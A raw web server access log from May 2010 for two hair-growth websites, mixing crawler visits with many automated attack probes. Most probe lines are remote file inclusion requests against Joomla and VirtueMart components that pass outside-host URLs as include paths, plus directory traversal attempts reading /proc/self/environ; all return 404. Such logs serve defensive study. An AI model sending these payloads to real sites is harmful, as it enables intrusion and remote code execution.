91.212.226.240 - - [17/May/2010:19:00:07 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:19:00:08 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "growlonghairfast.com"
91.212.226.210 - - [17/May/2010:19:01:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
91.212.226.210 - - [17/May/2010:19:01:35 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
91.214.45.238 - - [17/May/2010:19:03:32 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.214.45.238 - - [17/May/2010:19:03:32 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.214.45.238 - - [17/May/2010:19:04:46 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.freehairsecrets.com"
91.214.45.238 - - [17/May/2010:19:04:46 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.freehairsecrets.com"
207.44.228.84 - - [17/May/2010:19:05:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:06:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.92.73.143 - - [17/May/2010:19:07:32 -0700] "GET /logs/access_100503.log/index.php?option=com_extcalendar=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [17/May/2010:19:07:32 -0700] "GET /index.php?option=com_extcalendar=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [17/May/2010:19:07:32 -0700] "GET /logs/index.php?option=com_extcalendar=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
88.131.106.30 - - [17/May/2010:19:08:29 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "growlonghairfast.com"
88.131.106.30 - - [17/May/2010:19:08:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14675 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:08:54 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:08:54 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:08:54 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.92.73.143 - - [17/May/2010:19:09:16 -0700] "GET /logs/access_100419.log/index.php?option=com_extcalendar=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:09:32 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:09:32 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:09:32 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:19:10:22 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "freehairsecrets.com"
91.212.226.240 - - [17/May/2010:19:10:23 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "freehairsecrets.com"
200.61.185.200 - - [17/May/2010:19:10:44 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:19:10:44 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:19:10:45 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
91.212.226.210 - - [17/May/2010:19:11:49 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "freehairsecrets.com"
91.212.226.210 - - [17/May/2010:19:11:49 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "freehairsecrets.com"
124.115.6.16 - - [17/May/2010:19:11:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
77.88.25.28 - - [17/May/2010:19:16:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12861 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.44.228.84 - - [17/May/2010:19:17:27 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:17:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:17:27 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.235.237.85 - - [17/May/2010:19:18:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
119.235.237.85 - - [17/May/2010:19:18:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5606 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:19:19:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13444 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:19:19:45 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:19:19:45 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:19:19:46 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:21:19 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:21:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:19:21:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:54 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:54 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:55 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:22:59 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:25:52 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:25:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:25:53 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:31:29 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:31:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:19:31:30 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:34:59 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.163.148.130 - - [17/May/2010:19:36:03 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.fixedtostay.com/upload/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:19:42:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13449 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:19:49:15 -0700] "GET /logs/access_100308.log%20%20//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:19:49:15 -0700] "GET /logs/access_100322.log%20%20//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:19:49:15 -0700] "GET /delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:19:49:15 -0700] "GET /logs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.10.64 - - [17/May/2010:19:51:13 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
74.50.85.15 - - [17/May/2010:19:53:08 -0700] "GET /logs/access_100322.log//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:19:54:13 -0700] "GET /logs//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:19:54:13 -0700] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.50.85.15 - - [17/May/2010:19:54:13 -0700] "GET /delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.108.70.32 - - [17/May/2010:19:55:35 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:19:55:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:19:55:53 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:19:58:14 -0700] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:20:00:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5530 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:03:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.79.69.182 - - [17/May/2010:20:03:33 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
95.79.69.182 - - [17/May/2010:20:03:34 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:03:58 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:04:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:04:46 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.44.228.84 - - [17/May/2010:20:04:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.44.228.84 - - [17/May/2010:20:04:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [17/May/2010:20:05:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:05:34 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [17/May/2010:20:05:52 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [17/May/2010:20:05:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.55.146.200 - - [17/May/2010:20:05:52 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:20:06:41 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.44.228.84 - - [17/May/2010:20:06:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:07:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.163.162.245 - - [17/May/2010:20:09:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:10:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
69.163.162.245 - - [17/May/2010:20:12:17 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.163.162.245 - - [17/May/2010:20:12:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:12:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:13:04 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:13:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:13:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:13:31 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:13:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
69.163.162.245 - - [17/May/2010:20:13:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
188.163.69.124 - - [17/May/2010:20:16:06 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
188.163.69.124 - - [17/May/2010:20:16:06 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.freehairsecrets.com"
89.108.70.32 - - [17/May/2010:20:16:30 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:20:16:30 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:20:16:31 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
